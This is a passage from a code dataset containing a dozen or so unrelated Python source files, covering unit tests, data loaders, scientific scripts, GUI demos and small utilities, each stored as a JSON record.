{Package('pkg0', 'repo-in', None)},\n {Package('pkg4', 'repo-out', None)},\n (7, 8), (7, 9), []\n ),\n Event(\n 2, Action.MERGED,\n {Package('pkg1', 'repo-in', None), Package('pkg2', 'repo-in', None)},\n {Package('pkg3', 'repo-out', None)},\n (7, 9), (8, 0), [],\n ),\n Event(\n 3, Action.MERGED,\n {Package('pkg1', 'repo-in', 'wuzza:11'), Package('pkg2', 'repo-in', 'wuzza:11')},\n {Package('pkg3', 'repo-out', None)},\n (7, 9), (8, 0), [],\n )\n ]\n\n tasks = process_events([(7, 9), (8, 0)], events, installed_pkgs)\n\n if expected_relevance:\n assert not set(tasks[Task.INSTALL].keys()) - {('pkg3', None), ('pkg4', None)}\n removed_packages = set()\n if any(p[1] for p in installed_pkgs):\n removed_packages = installed_pkgs\n if ('pkg0', None) in installed_pkgs:\n removed_packages.add(('pkg0', None))\n if ('pkg1', None) in installed_pkgs or ('pkg2', None) in installed_pkgs:\n removed_packages.add(('pkg1', None))\n removed_packages.add(('pkg2', None))\n\n assert not set(tasks[Task.REMOVE].keys()) - removed_packages\n else:\n assert not tasks[Task.INSTALL]\n assert not tasks[Task.REMOVE]\n","sub_path":"repos/system_upgrade/common/actors/peseventsscanner/tests/unit_test_peseventsscanner.py","file_name":"unit_test_peseventsscanner.py","file_ext":"py","file_size_in_byte":34269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336861220","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom config import get_config\n\nimport numpy as np\n\n\n__AUTHOR__ = \"kozistr\"\n__VERSION__ = \"0.1\"\n\ncfg, _ = get_config() # configuration\n\n# set random seed\nnp.random.seed(cfg.seed)\n\n\nclass Char2VecEmbeddings:\n \"\"\"\n Copyright 2018 NAVER Corp.\n Permission is hereby granted, free of charge, to any person obtaining a copy of this software and\n associated documentation files (the \"Software\"), to deal in the Software without restriction, including\n without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to\n the following conditions:\n The above copyright notice and this permission notice shall be included in all copies or substantial\n portions of the Software.\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\n INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\n CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE\n OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n \"\"\"\n\n def __init__(self):\n self.cho = \"ㄱㄲㄴㄷㄸㄹㅁㅂㅃㅅㅆㅇㅈㅉㅊㅋㅌㅍㅎ\" # len = 19\n self.jung = \"ㅏㅐㅑㅒㅓㅔㅕㅖㅗㅘㅙㅚㅛㅜㅝㅞㅟㅠㅡㅢㅣ\" # len = 21\n self.jong = \"ㄱ/ㄲ/ㄱㅅ/ㄴ/ㄴㅈ/ㄴㅎ/ㄷ/ㄹ/ㄹㄱ/ㄹㅁ/ㄹㅂ/ㄹㅅ/ㄹㅌ/ㄹㅍ/ㄹㅎ/ㅁ/ㅂ/ㅂㅅ/ㅅ/ㅆ/ㅇ/ㅈ/ㅊ/ㅋ/ㅌ/ㅍ/ㅎ\".\\\n split('/') # len = 27\n self.kor_chars = self.cho + self.jung + ''.join(self.jong)\n\n self.len_jung = len(self.jung)\n self.len_jong = len(self.jong) + 1\n self.hangul_length = len(self.kor_chars)\n\n def is_valid_char(self, x):\n return x in self.kor_chars\n\n def decompose(self, x, warning=True):\n in_char = x\n if x < ord('가') or x > ord('힣'): # not korean char\n return chr(x)\n\n x -= ord('가')\n y = x // self.len_jong\n z = x % self.len_jong\n x = y // self.len_jung\n y = y % self.len_jung\n\n zz = self.jong[z - 1] if z > 0 else ''\n if x >= len(self.cho):\n if warning:\n print(\"[-] Unknown Exception : \", in_char, chr(in_char), x, y, z, zz)\n return self.cho[x] + self.jung[y] + zz\n\n def decompose_str(self, string, warning=True):\n return ''.join([self.decompose(ord(x), warning=warning) for x in string])\n\n def decompose_as_one_hot(self, in_char, warning=True):\n # print(ord('ㅣ'), chr(0xac00))\n # [0, 66]: hangul / [67, 194]: ASCII / [195, 245]: hangul danja, danmo / [246, 249]: special characters\n # Total 250 dimensions.\n\n one_hot = []\n\n if ord('가') <= in_char <= ord('힣'): # 가:44032 , 힣: 55203\n x = in_char - ord('가')\n y = x // self.len_jong\n z = x % self.len_jong\n x = y // self.len_jung\n y = y % self.len_jung\n\n zz = self.jong[z - 1] if z > 0 else ''\n if x >= len(self.cho):\n if warning:\n print(\"[-] Unknown Exception : \", in_char, chr(in_char), x, y, z, zz)\n\n one_hot.append(x)\n one_hot.append(len(self.cho) + y)\n if z > 0:\n one_hot.append(len(self.cho) + len(self.jung) + (z - 1))\n return one_hot\n else:\n if in_char < 128:\n return [self.hangul_length + in_char] # 67 ~\n elif ord('ㄱ') <= in_char <= ord('ㅣ'):\n return [self.hangul_length + 128 + (in_char - 12593)] # 194 ~ # [ㄱ:12593] ~ [ㅣ:12643] (len = 51)\n elif in_char == ord('♡'):\n return [self.hangul_length + 128 + 51] # 245 ~ # ♡\n elif in_char == ord('♥'):\n return [self.hangul_length + 128 + 51 + 1] # ♥\n elif in_char == ord('★'):\n return [self.hangul_length + 128 + 51 + 2] # ★\n elif in_char == ord('☆'):\n return [self.hangul_length + 128 + 51 + 3] # ☆\n else:\n if warning:\n print(\"[-] Unhandled character : \", chr(in_char), in_char)\n return []\n\n def decompose_str_as_one_hot(self, string, warning=True):\n tmp_list = []\n for x in string:\n tmp_list.extend(self.decompose_as_one_hot(ord(x), warning=warning))\n return tmp_list\n\n def __str__(self):\n return \"Char2Vec\"\n\n\nclass DataIterator:\n\n def __init__(self, text, text_len, mel, mag, batch_size):\n \"\"\" DataLoader\n :param text: An Numpy Object. Text data.\n :param text_len: An Numpy Object. Text length data.\n :param mel: An Numpy Object. mel-spectrogram data.\n :param mag: An Numpy Object. magnitude data.\n :param y: An Numpy Object. Label audio.\n :param batch_size: An int. Batch size.\n \"\"\"\n self.text = text\n self.text_len = text_len\n self.mel = mel\n self.mag = mag\n self.batch_size = batch_size\n\n self.num_examples = num_examples = text.shape[0]\n self.num_batches = num_examples // batch_size\n self.pointer = 0\n\n assert (self.batch_size <= self.num_examples)\n\n def next_batch(self):\n start = self.pointer\n self.pointer += self.batch_size\n\n if self.pointer > self.num_examples:\n perm = np.arange(self.num_examples)\n np.random.shuffle(perm)\n\n self.text = self.text[perm]\n self.text_len = self.text_len[perm]\n self.mel = self.mel[perm]\n self.mag = self.mag[perm]\n\n start = 0\n self.pointer = self.batch_size\n\n end = self.pointer\n\n return self.text[start:end], self.text_len[start:end], self.mel[start:end], self.mag[start:end]\n\n def iterate(self):\n for step in range(self.num_batches):\n yield self.next_batch()\n","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"584563552","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndef loadData(GenDescription):\r\n \"\"\"\r\n Python code en txt files moeten in deze map gelocaliseerd zijn.\r\n Laad data in dat nodig is voor fase 3 de beschrijving van de genen.\r\n Input: textbestand GenDescription\r\n Output: Dictionary\r\n \"\"\"\r\n #lees txt bestanden\r\n infileGen = open(GenDescription)\r\n lines = infileGen.read().splitlines()\r\n infileGen.close()\r\n \r\n locsID=list(range(0,len(lines),3)) #list of keys positions\r\n IDsGen=[]\r\n for locID in locsID:\r\n #add ID's to list\r\n ID=lines[locID]\r\n IDsGen.append(ID)\r\n \r\n locsDescription=list(range(1,len(lines),3)) #list of values positions\r\n descriptionGen=[]\r\n for locDescription in locsDescription:\r\n #add descriptions to list\r\n description=lines[locDescription]\r\n descriptionGen.append(description)\r\n \r\n dictGenDes = {}\r\n for ID in IDsGen:\r\n dictGenDes[ID]=descriptionGen[IDsGen.index(ID)]\r\n \r\n return dictGenDes\r\nloadData('GenDescription2.txt')\r\n\r\ndef resultladen(tekstbestand):\r\n #input: resultaten clusteren .txt\r\n #output: dictionary met CloneID en clusternummer\r\n \r\n #open het tekstbestand, lees het regel voor regel in en sluit het\r\n f = open(tekstbestand, \"r\")\r\n clusterresultlines = f.read().splitlines()\r\n f.close()\r\n \r\n #maak een lege dictionary aan\r\n clusterresultdict = {}\r\n #iedere regel wordt gesplitst op 3 spaties, zodat ze als key:value aan de dictionary toegevoegd kunnen worden\r\n for i in clusterresultlines:\r\n linesplit= i.split(\" \")\r\n clusterresultdict[linesplit[0]]=linesplit[1]\r\n \r\n return clusterresultdict\r\nresultladen(\"Voorbeeld_clusterresult.txt\")\r\n\r\ndef ESTs(df_clusterdata, dictGenDes):\r\n df_clusterdata['Description'] = df_clusterdata.CloneID.replace(dictGenDes)\r\n \r\n df_ESTs = df_clusterdata.loc[df_clusterdata['Description'] == 'ESTs']\r\n df_ESTs = df_ESTs[['CloneID', 'cluster_nummer', 'Description']]\r\n grouped_EST = df_ESTs.groupby(['cluster_nummer', 'Description']).size()\r\n grouped_EST = grouped_EST.to_frame() \r\n grouped_EST = grouped_EST.rename(columns={0:'count'})\r\n grouped_EST = grouped_EST.reset_index()\r\n \r\n my_colors = list('rgbkymc')\r\n ax = grouped_EST.plot.bar(x='cluster_nummer', y='count', rot=0, color=my_colors)\r\n ax.set_xlabel('Cluster nummer')\r\n ax.set_ylabel('Aantal genen met een EST in het cluster')\r\n ax.get_legend().remove()\r\n plt.tight_layout()\r\n","sub_path":"EST.py","file_name":"EST.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"23003731","text":"import h5py\nimport numpy as np\nfrom model import *\nimport argparse\nparser = argparse.ArgumentParser(description='Multi-layer perceptron')\n\nparser.add_argument('--layers', nargs='+', type=int,default=[784,512,256,128,256,512,784])\nparser.add_argument('--epochs', type=int,default=2000)\nparser.add_argument('--batch_size', type=int,default=256)\nparser.add_argument('--resume', type=int,default=-1)\nargs = parser.parse_args()\nprint(args)\ndef lr(epoch): # learnin rate scheduler\n\tif epoch in range(0,500):\n\t\treturn 0.01\n\telif epoch in range(500,1000):\n\t\treturn 0.001\n\telse:\n\t\treturn 0.0001\nMNIST_data = h5py.File(\"../mnist.hdf5\", 'r') # load data\n\nx_train = np.float32(MNIST_data['x_train'][:])\nprint(x_train.shape)\nx_test = np.float32(MNIST_data['x_train'][:256])\nMNIST_data.close()\n\ntest = x_test.reshape(-1,28,28,1)*255. # test images\nsave_image(16,16,test,'./original.png')\n\nbatch_size=args.batch_size\nepochs=args.epochs\nmodel = Model([784,512,256,128,256,512,784])\nif args.resume >=0: # load pretrained model\n\tckpt = np.load('./weights/{}.npy'.format(args.resume),allow_pickle=True).item()\n\tmodel.weights = ckpt['weights']\n\tmodel.biases = ckpt['biases']\nfor i in range(epochs):\n\tavg_loss = 0.\n\tfor j in range(0,len(x_train),batch_size): # sample batch\n\t\tbatch = x_train[j:j+batch_size,:].transpose() if j+batch_size <= len(x_train) else x_train[j:,:].transpose()\n\t\tloss = model.update(batch,batch,lr(i))\n\t\tavg_loss += loss\n\n\tx_test_r = model.predict(x_test.transpose()).transpose()\n\ttest_r = x_test_r.reshape(-1,28,28,1)*255.\n\tsave_image(16,16,test_r,'./reconstructed.png') # reconstruct image forn evaluation\n\tprint('Epoch {}, Loss : {:3f}'.format(i,avg_loss/len(x_train)))\n\tif i%50 ==0 or i == epochs-1: # save weights\n\t\tnp.save('./weights/{}.npy'.format(i),{'weights': model.weights, 'biases': model.biases})","sub_path":"RL/CS17BTECH11029_HW2/Q2/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"626442547","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os,sys\n# add ../../Sources to the PYTHONPATH\nsys.path.append(os.path.join(\"..\",\"..\",\"Sources\"))\nfrom yoctopuce.yocto_api import *\nfrom yoctopuce.yocto_humidity import *\nfrom yoctopuce.yocto_temperature import *\nfrom yoctopuce.yocto_pressure import *\n\ndef usage():\n scriptname = os.path.basename(sys.argv[0])\n print(\"Usage:\")\n print(scriptname+' ')\n print(scriptname+' ')\n print(scriptname+' any ')\n sys.exit()\n\ndef die(msg):\n sys.exit(msg+' (check USB cable)')\n\nerrmsg=YRefParam()\n\nif len(sys.argv)<2 : usage()\n\ntarget=sys.argv[1]\n\n# Setup the API to use local USB devices\nif YAPI.RegisterHub(\"usb\", errmsg)!= YAPI.SUCCESS:\n sys.exit(\"init error\"+errmsg.value)\n\nif target=='any':\n # retreive any humidity sensor\n sensor = YHumidity.FirstHumidity()\n if sensor is None :\n die('No module connected')\n m = sensor.get_module()\n target = m.get_serialNumber()\n\nelse:\n m = YModule.FindModule(target)\n\nif not m.isOnline() : die('device not connected')\n\nhumSensor = YHumidity.FindHumidity(target+'.humidity')\npressSensor = YPressure.FindPressure(target+'.pressure')\ntempSensor = YTemperature.FindTemperature(target+'.temperature')\n\n\nwhile True:\n print('%4.2f' % tempSensor.get_currentValue()+\"°C \"\\\n + \"%6.1f\" % pressSensor.get_currentValue()+\"mb \"\\\n + \"%4.1f\" % humSensor.get_currentValue()+\"% (Ctrl-c to stop) \")\n YAPI.Sleep(1000)\n","sub_path":"yocto_meteo.py","file_name":"yocto_meteo.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"461512814","text":"import pyttsx3\nfrom playsound import playsound\n\nengine = pyttsx3.init()\nvoices = engine.getProperty(\"voices\")\ntext = \"Mic testing 1 2 3\"\nengine.setProperty(\"rate\", 200)\nengine.setProperty(\"voice\", voices[1].id) #voices[1] is for female voice and voice[0] is for male voice\n\nengine.say(text)\nengine.runAndWait()\n","sub_path":"Python/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"649025640","text":"#\n# Copyright (C) 2013 - 2015 Satoru SATOH \n# License: MIT\n#\n\"\"\"configobj backend.\n\n- Format to support: configobj, http://goo.gl/JbP2Kp (readthedocs.org)\n- Requirements: configobj (https://pypi.python.org/pypi/configobj/)\n- Limitations: None obvious\n- Special options:\n\n - All options except for 'infile' passed to configobj.ConfigObj.__init__\n should work.\n\n - See also: http://goo.gl/LcVOzZ (readthedocs.org)\n\"\"\"\nfrom __future__ import absolute_import\n\nimport configobj\nimport anyconfig.backend.base\n\n\nclass Parser(anyconfig.backend.base.Parser):\n \"\"\"\n Parser for Ini-like config files which configobj supports.\n \"\"\"\n _type = \"configobj\"\n _priority = 10\n _load_opts = [\"cls\", \"configspec\", \"encoding\", \"interpolation\",\n \"raise_errors\", \"list_values\", \"create_empty\", \"file_error\",\n \"stringify\", \"indent_type\", \"default_encoding\", \"unrepr\",\n \"_inspec\", ]\n _dump_opts = [\"cls\", \"encoding\", \"list_values\", \"indent_type\",\n \"default_encoding\", \"unrepr\", \"write_empty_values\", ]\n\n @classmethod\n def load_impl(cls, config_fp, **kwargs):\n \"\"\"\n :param config_fp: Config file object\n :param kwargs: backend-specific optional keyword parameters :: dict\n\n :return: dict object holding config parameters\n \"\"\"\n return configobj.ConfigObj(config_fp, **kwargs)\n\n @classmethod\n def dumps_impl(cls, data, **kwargs):\n \"\"\"\n :param data: Data to dump :: dict\n :param kwargs: backend-specific optional keyword parameters :: dict\n\n :return: string represents the configuration\n \"\"\"\n conf = configobj.ConfigObj(**kwargs)\n conf.update(data)\n conf.filename = None\n\n return '\\n'.join(conf.write())\n\n @classmethod\n def dump_impl(cls, data, config_path, **kwargs):\n \"\"\"\n :param data: Data to dump :: dict\n :param config_path: Dump destination file path\n :param kwargs: backend-specific optional keyword parameters :: dict\n \"\"\"\n conf = configobj.ConfigObj(**kwargs)\n conf.update(data)\n\n conf.write(open(config_path, 'wb'))\n\n# vim:sw=4:ts=4:et:\n","sub_path":"anyconfig/backend/configobj.py","file_name":"configobj.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"596634882","text":"import sys\nfrom PyQt5.QtWidgets import QMainWindow,QApplication,QPushButton,QHBoxLayout,QWidget\n\ndef ButtonOnClick():\n print('Button clicked!')\n\n # print(\"widget.x() = %d\" % widget.x()) # window abscissa\n # print(\"widget.y() = %d\" % widget.y()) # window ordinate\n # print(\"widget.width() = %d\" % widget.width()) # Workspace width\n # print(\"widget.height() = %d\" % widget.height()) # Workspace heignt\n '''\n widget.x() = 260\n widget.y() = 200\n widget.width() = 300\n widget.height() = 240\n '''\n\n # print(\"widget.geometry().x() = %d\" % widget.geometry().x()) # Workspace abscissa\n # print(\"widget.geometry().y() = %d\" % widget.geometry().y()) # Workspace ordinate\n # print(\"widget.geometry().width() = %d\" % widget.geometry().width()) # Workspace width\n # print(\"widget.geometry().height() = %d\" % widget.geometry().height()) # Workspace heignt\n '''\n widget.geometry().x() = 261\n widget.geometry().y() = 238\n widget.geometry().width() = 300\n widget.geometry().height() = 240\n '''\n print(\"widget.frameGeometry().x() = %d\" % widget.frameGeometry().x()) # window abscissa\n print(\"widget.frameGeometry().y() = %d\" % widget.frameGeometry().y()) # window ordinate\n print(\"widget.frameGeometry().width() = %d\" % widget.frameGeometry().width() ) # window width\n print(\"widget.frameGeometry().height() = %d\" % widget.frameGeometry().height()) # window heignt\n\n\napp = QApplication(sys.argv)\n\nwidget = QWidget()\nbutton = QPushButton(widget)\nbutton.setText('Push')\nbutton.clicked.connect(ButtonOnClick)\n\n# set function erea size\nwidget.resize(300,240)\nwidget.move(260,200)\nwidget.setWindowTitle('Geometry')\n\nbutton.move(130,110)\n\nwidget.show()\nsys.exit(app.exec_())","sub_path":"p023/screen_geometry.py","file_name":"screen_geometry.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"3772751","text":"__author__ = 'theid'\nfrom km3pipe import Module, Blob, constants\nimport ROOT\n\n\nclass AdditionalROOTFile(Module):\n def __init__(self, **context):\n super(self.__class__, self).__init__(**context)\n self.file_name = self.get(\"filename\")\n self.additionalFile = ROOT.TFile(self.file_name)\n self.tree_name = self.get(\"treename\")\n self.true_tree = self.additionalFile.Get(self.tree_name)\n self.run_id = self.get(\"runId\")\n self.tree = self.true_tree.CopyTree(\"run==\"+str(self.run_id))\n self.maximum_number_of_events = self.tree.GetEntries()\n\n\n\n #self.storage = Functions.GenerateStorage(self.tree.GetListOfBranches(), self.tree)\n #Functions.SetBranchAddresses(self.storage, self.tree)\n\n self.numberOfEvents = self.tree.GetEntries()\n self.currentEvent = -1\n\n self.Counter = 0\n self.Tested = 0\n self.lastRootEventCount = -1\n\n def process(self, blob):\n self.Tested += 1\n eventId = blob['Evt'].id\n\n if self.storage[\"ev\"][0] == eventId:\n self.prepareBlob(blob)\n return blob\n\n else:\n previous_event_id = -1\n while self.storage[\"ev\"][0] < eventId:\n if self.storage[\"ev\"][0] == previous_event_id:\n break\n previous_event_id = self.storage[\"ev\"][0]\n self.lastRootEventCount += 1\n self.tree.GetEntry(self.lastRootEventCount)\n if self.storage[\"ev\"][0] == eventId:\n self.prepareBlob(blob)\n return blob\n\n def prepareBlob(self, blob):\n blob['storage'] = self.storage\n self.Counter += 1\n\n def finish(self):\n print(self.Counter)\n\n\nclass ReadMCValues(Module):\n def __init__(self, **context):\n super(self.__class__, self).__init__(**context)\n\n def process(self, blob):\n blob[\"AdditionalMCValues\"] = {}\n blob[\"AdditionalMCValues\"][\"taulength\"] = blob['Evt'].mc_trks[1].len\n blob[\"AdditionalMCValues\"][\"cc\"] = blob['Evt'].mc_trks[0].usr[0]\n blob[\"AdditionalMCValues\"][\"by\"] = blob['Evt'].mc_trks[0].usr[1]\n blob[\"AdditionalMCValues\"][\"ichan\"] = blob['Evt'].mc_trks[0].usr[2]\n\n return blob\n","sub_path":"AdditionalInformation.py","file_name":"AdditionalInformation.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395830533","text":"import pdb\n\"\"\"\nCreated on Tue Jun 3 11:32:19 2014\n\n@author: rkp\n\nCalculate a covariance matrix of all (normalized) dynamical quantities.\n\"\"\"\n\nimport pickle\n\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib.cm as cm\n\nSPEED_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_speed.pickle'\nVEL_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_velocity.pickle'\nACC_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_acceleration.pickle'\nANG_VEL_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_ang_velocity.pickle'\nANG_ACC_FILE = '/Users/rkp/Research/insect_flight/real_data/trajectories/processed/mosquito/odor_off_clean_ang_acceleration.pickle'\nTICK_LABELS = ['S','Vx','Vy','Vz','Ax','Ay','Az','Wx','Wy','Wz','ax','ay','az']\n\ndef calc(speed_file=SPEED_FILE,vel_file=VEL_FILE,acc_file=ACC_FILE,ang_vel_file=ANG_VEL_FILE,\n ang_acc_file=ANG_ACC_FILE,tick_labels=TICK_LABELS):\n \"\"\"Calculate the covariance matrix of the data in all the files.\"\"\"\n \n with open(speed_file) as f:\n S = pickle.load(f)['data']\n # Make a big matrix\n S = np.concatenate([S[key] for key in np.sort(S.keys())],0)\n S = S[:,np.newaxis]\n with open(vel_file) as f:\n V = pickle.load(f)['data']\n V = np.concatenate([V[key] for key in np.sort(V.keys())],0)\n with open(acc_file) as f:\n A = pickle.load(f)['data']\n A = np.concatenate([A[key] for key in np.sort(A.keys())],0)\n with open(ang_vel_file) as f:\n W = pickle.load(f)['data']\n W = np.concatenate([W[key] for key in np.sort(W.keys())],0)\n with open(ang_acc_file) as f:\n AA = pickle.load(f)['data']\n AA = np.concatenate([AA[key] for key in np.sort(AA.keys())],0)\n \n # Make full data matrix\n D = np.concatenate([S,V,A,W,AA],1)\n # Normalize data matrix\n D /= D.std(0)\n \n C = np.cov(D.T)\n \n fig = plt.figure(facecolor='w')\n ax = fig.add_subplot(111)\n ax.set_xticks(np.arange(0,13))\n ax.set_xticklabels(tick_labels)\n ax.set_yticks(np.arange(0,13))\n ax.set_yticklabels(tick_labels)\n ax.set_title('Data covariance')\n \n cax = ax.imshow(C,interpolation='nearest',cmap = cm.jet)\n cbar = fig.colorbar(cax)\n \n return C\n \nif __name__ == '__main__':\n calc()","sub_path":"wind_tunnel/old/stats/cov/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184084121","text":"# Definition for singly-linked list.\nclass ListNode(object):\n\n def __init__(self, x):\n self.val = x\n self.next = None\n\n# Definition for a binary tree node.\n\n\nclass TreeNode(object):\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n\n def BuildBinaryTree(self, node, val):\n if node.val > val:\n if not node.left:\n node.left = TreeNode(val)\n else:\n self.BuildBinaryTree(node.left, val)\n\n if node.val < val:\n if not node.right:\n node.right = TreeNode(val)\n else:\n self.BuildBinaryTree(node.right, val)\n\n\n def sortedListToBST(self, head):\n \th = head\n \tslow,fast =head,head\n\n \twhile fast and fast.next:\n \t\tfast = fast.next.next\n \t\tslow = slow.next\n\n \ttreeNodeHead = TreeNode(slow.val)\n \tfast = h\n\n \twhile slow.next:\n \t\tBuildBinaryTree(treeNodeHead,slow.next.val)\n \t\tBuildBinaryTree(treeNodeHead,)\n","sub_path":"109-convert-sorted-list-to-binary-search-tree/109.py","file_name":"109.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"390373040","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This file is part of visvalingamwyatt.\n# https://github.com/fitnr/visvalingamwyatt\n\n# Licensed under the MIT license:\n# http://www.opensource.org/licenses/MIT-license\n# Copyright (c) 2015, fitnr \nimport os\nimport json\nimport unittest\nfrom collections import namedtuple\nimport numpy as np\nimport visvalingamwyatt as vw\nfrom visvalingamwyatt import __main__ as cli\n\nclass TestCase(unittest.TestCase):\n\n def setUp(self):\n with open('tests/data/sample.json') as f:\n self.fixture = json.load(f).get('features')[0]\n\n def standard(self, **kwargs):\n result = vw.simplify_feature(self.fixture, **kwargs)\n\n assert 'geometry' in result\n assert 'properties' in result\n assert result['properties'] == self.fixture['properties']\n assert self.fixture['geometry']['type'] == result['geometry']['type']\n assert self.fixture['geometry']['coordinates'][0] == result['geometry']['coordinates'][0]\n\n assert len(self.fixture['geometry']['coordinates']) > len(result['geometry']['coordinates'])\n\n return result\n\n def testSimplifyFeature(self):\n self.standard()\n\n def testSimplifyFeatureThreshold(self):\n self.standard(threshold=0.1)\n\n def testSimplifyFeatureRatio(self):\n result = self.standard(ratio=0.1)\n\n b = vw.simplify_feature(self.fixture, ratio=0.90)\n assert len(b['geometry']['coordinates']) > len(result['geometry']['coordinates'])\n for i, j in zip(range(1, 9), range(2, 10)):\n r = vw.simplify_feature(self.fixture, ratio=float(i) / 10)\n s = vw.simplify_feature(self.fixture, ratio=float(j) / 10)\n assert len(r['geometry']['coordinates']) <= len(s['geometry']['coordinates'])\n\n def testSimplifyFeatureNumber(self):\n result = self.standard(number=10)\n self.assertEqual(len(result['geometry']['coordinates']), 10)\n\n def test3dCoords(self):\n coordinates = [[0.0, 0.0, 0.0], [1.1, 0, 1], [2.1, 3, 0], [4.1, 5, 10], [1.1, 2, 0], [5.1, 2, 0]]\n a = vw.simplify(coordinates)\n self.assertEqual(a[0], [0, 0, 0])\n self.assertLessEqual(len(a), len(coordinates))\n\n def testSimplifyTupleLike(self):\n Point = namedtuple(\"Point\", (\"x\", \"y\"))\n\n # coordinates are in the shape\n #\n # c\n # b d\n # a e\n #\n # so b and d are eliminated\n\n a, b, c, d, e = Point(0, 0), Point(1, 1), Point(2, 2), Point(3, 1), Point(4, 0)\n inp = [a, b, c, d, e]\n expected_output = np.array([a, c, e])\n\n actual_output = vw.simplify(inp, threshold=0.001)\n self.assertTrue(np.array_equal(actual_output, expected_output))\n\n def testSimplifyIntegerCoords(self):\n # coordinates are in the shape\n #\n # c\n # b d\n # a e\n #\n # so b and d are eliminated\n\n a, b, c, d, e = (0, 0), (1, 1), (2, 2), (3, 1), (4, 0)\n inp = [a, b, c, d, e]\n expected_output = np.array([a, c, e])\n\n actual_output = vw.simplify(inp, threshold=0.001)\n self.assertTrue(np.array_equal(actual_output, expected_output))\n\n def testCli(self):\n pass\n\n def testSimplify(self):\n try:\n output = 'tmp.json'\n cli.simplify('tests/data/sample.json', output, number=9)\n\n self.assertTrue(os.path.exists(output))\n\n with open('tmp.json', 'r') as f:\n result = json.load(f)\n coords = result['features'][0]['geometry']['coordinates']\n self.assertEqual(len(coords), 9)\n\n finally:\n os.remove(output)\n","sub_path":"tests/test_vw.py","file_name":"test_vw.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"569628598","text":"import csv\nD = {}\ninFile = open('/mnt/larsix/projects/NMD/hansun/Data/DrugBank/all.csv')\ninFile = csv.reader(inFile)\nfor line in inFile:\n gene = line[2]\n drug = line[12:]\n for dg in drug:\n if dg:\n dgs = dg.split(';')\n for x in dgs:\n x = x.strip()\n if x:\n D.setdefault(gene, [])\n D[gene].append(x)\nouFile = open('DrugBank_Gene_Drugs', 'w')\nfor k in D:\n if k:\n ouFile.write(k + '\\t' + k.upper() + '\\t' + '\\t'.join(D[k]) + '\\n')\nouFile.close()\n","sub_path":"Data/DrugBank/01-DrugBank.py","file_name":"01-DrugBank.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595208745","text":"from os import walk\nfrom pathlib import Path\nfrom typing import List, Dict\nfrom urllib.request import urlretrieve\n\nimport pandas as pd\n\nimport settings\n\n\ndef remove_file(path):\n Path(path).unlink()\n\n\ndef download_file_from_url(url, fpath):\n urlretrieve(url, fpath)\n return fpath\n\n\ndef list_files(dirpath: str, pattern: str = \"*\") -> List:\n _, _, filenames = next(walk(dirpath))\n files = [\n Path(dirpath).joinpath(filename)\n for filename in filenames\n if Path(dirpath).joinpath(filename).match(pattern)\n ]\n files.sort(key=(lambda x: -x.stat().st_mtime))\n return files\n\n\ndef find_file(folder: str, pattern: str):\n return list_files(folder, pattern)[0]\n\n\ndef serie_to_lowercase(df: pd.DataFrame, cols: List[str]):\n for col in cols:\n df[col] = df[col].apply(\n lambda x: x.lower().strip() if isinstance(x, str) else x\n )\n\n\ndef get_exposition_level(nb: int, **kwargs) -> int:\n type = kwargs[\"type\"]\n return (\n max(settings.EXPOSITION[type].items(), 